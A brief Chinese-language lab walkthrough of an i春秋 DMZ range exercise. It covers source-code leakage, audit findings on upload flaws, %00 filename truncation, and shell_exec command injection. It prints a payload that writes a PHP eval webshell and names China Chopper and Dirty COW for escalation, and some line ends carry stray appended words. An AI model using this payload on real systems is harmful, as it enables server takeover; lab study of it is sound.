i春秋DMZ大型靶場實驗(三)內網轉發DMZ2

 

更具實驗文件知道存在源碼泄露  下載源碼進行源碼審計php

發現admin帳號html

查看user.php 發現mysql 帳號 端口mysql

對登陸後源碼進行審計 發現上傳文件的兩處漏洞sql

對 fiel name 能夠 %00 截斷 上傳一句話木馬   對file name   shell_exec 未對參數過濾 能夠拼接執行 命令 寫一句話 例如 shell

'|| echo "<?php eval($_POST[1])?>" >/var/www/html/2.php||'htm

 

菜刀鏈接blog

 上傳髒牛提權源碼

相關文章
相關標籤/搜索